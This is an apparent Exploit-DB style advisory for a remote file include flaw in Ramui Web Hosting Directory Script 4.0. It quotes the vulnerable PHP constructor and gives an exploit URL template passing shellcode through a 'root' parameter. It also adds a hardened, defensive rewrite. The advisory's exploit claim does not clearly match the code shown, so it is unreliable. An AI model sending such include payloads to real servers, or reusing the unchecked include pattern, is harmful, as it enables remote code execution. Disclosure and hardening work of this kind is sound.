Vendor: Web Hosting Directory Script
By: bd0rk
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Web Hosting Directory Script
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: //a:ramui:web_hosting_directory_script:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Ramui web hosting directory script 4.0 Remote File Include Vulnerability

The $root parameter is a __construct parameter, but no value was passed to it. Therefore, nothing can be checked before the include on line 13, so an attacker can execute malicious shellcode through it. In this case, the __construct is meaningless.

Mitigation:

Input validation should be done to prevent malicious code injection.
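
A hardened form of the constructor from the proof-of-concept excerpt, as an added example that is not taken from the advisory or the vendor's code. APP_ROOT, resolveRoot() and the directory layout (database/ two levels above gb/include/) are assumptions made for illustration.

```php
<?php
// Added example: hardened variant of the connection constructor.
// APP_ROOT and resolveRoot() are hypothetical names, not the vendor's code.
// Defence in depth: keep allow_url_include = Off in php.ini as well.
declare(strict_types=1);

// Derived from this file's own location, never from request data.
// Assumption: this file lives in <app>/gb/include/ and database/ is in <app>/.
define('APP_ROOT', realpath(__DIR__ . '/../..'));

class connection
{
    protected $site;
    public $error = false;
    protected $admin = false;

    function __construct(string $root)
    {
        $config = self::resolveRoot($root) . '/database/config.php';
        if (!is_file($config)) {
            throw new RuntimeException('config.php not found under application root');
        }
        include $config;
    }

    // Returns the canonical directory for $root, or throws when it names a
    // URL/stream wrapper, does not exist, or resolves outside APP_ROOT.
    private static function resolveRoot(string $root): string
    {
        if (strpos($root, '://') !== false || strpos($root, "\0") !== false) {
            throw new InvalidArgumentException('wrappers and NUL bytes are not allowed in root');
        }
        $real = realpath($root); // collapses ../ and symlinks; false if missing
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException('root does not exist');
        }
        // Appending the separator stops /srv/app2 from matching /srv/app.
        if (strpos($real . DIRECTORY_SEPARATOR, APP_ROOT . DIRECTORY_SEPARATOR) !== 0) {
            throw new InvalidArgumentException('root is outside the application directory');
        }
        return $real;
    }
}
```

Callers would pass APP_ROOT or a directory beneath it; any other value raises an exception before the include statement is reached.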

Exploit-DB raw data:

# Title: Ramui web hosting directory script 4.0 Remote File Include Vulnerability
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com
# Download: http://ramui.com/directory-script/download-v4.html

Proof-of-Concept:
/gb/include/connection.php lines 6-13 in php-sourcecode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class connection
{
    protected $site;
    public $error=false;
    protected $admin=false;
    function __construct($root)
    {
        // line 13: $root is concatenated into the include path with no check
        include $root."database/config.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The $root-parameter is a __construct.
But no value was passed to it.
Therefore, nothing can be checked before include in line 13.
So an attacker can execute malicious shellcode through it.
In this case, the __construct is meaningless.


[+]Exploit: http://[server]/path/gb/include/connection.php?root=[YourShellcode]


~~Everything revolves. Even the planet. :)~~
***Greetz to ALL my followers on Twitter!***

/bd0rk